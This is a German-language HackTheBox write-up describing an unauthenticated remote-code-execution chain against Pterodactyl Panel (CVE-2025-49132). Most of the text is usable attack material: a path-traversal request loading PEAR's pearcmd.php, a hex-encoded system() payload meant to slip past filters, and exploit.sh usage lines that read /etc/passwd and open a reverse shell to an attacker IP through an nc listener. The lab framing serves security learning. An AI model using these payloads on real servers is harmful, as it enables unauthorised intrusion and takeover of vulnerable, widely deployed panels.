
Nicht authentifizierter RCE-Exploit für das Pterodactyl Panel (CVE-2025-49132), der Path Traversal mit PEAR Command Injection kombiniert, um beliebigen PHP-Code auf angreifbaren Servern auszuführen.
HTB Season 10 - Pterodactyl Machine Writeup
Ziel: Pterodactyl HTB-Maschine (Mittlerer Schwierigkeitsgrad)
CVE: CVE-2025-49132
Schweregrad: Kritisch (CVSS 9.8)
Angriffsart: Nicht authentifizierte Remote-Codeausführung
Betroffen: Pterodactyl Panel < v1.11.11
Diese Exploit-Kette kombiniert:
Der /locales/locale.json-Endpunkt des Pterodactyl-Panels ermöglicht Path Traversal über den Parameter locale:
GET /locales/locale.json?locale=../../../../../../usr/share/php/PEAR&namespace=pearcmd
Dies kann mit PEARs pearcmd.php kombiniert werden, um:
/tmp zu schreibenPEAR (PHP Extension and Application Repository) verfügt über ein CLI-Tool (pearcmd.php), das:
config-create-Befehl hat, der Dateien schreibtDie Exploit-Kette:
Path Traversal → pearcmd.php laden → PHP via config-create einschleusen → Schädliches PHP ausführen
Befehle werden mit hex2bin() hex-codiert, um folgendes zu umgehen:
Beispiel:
Befehl: whoami
Hex: 77686f616d69
Payload: <?=system(hex2bin('77686f616d69'))?>
Methode: Mit bereitgestelltem exploit.sh
chmod +x exploit.sh
# Benutzer-Flag abrufen
./exploit.sh flag
# Befehle ausführen
./exploit.sh cmd "whoami"
./exploit.sh cmd "cat /etc/passwd"
# Reverse Shell
nc -lvnp 4444 # Auf Angreifermaschine
./exploit.sh shell 10.10.14.21 4444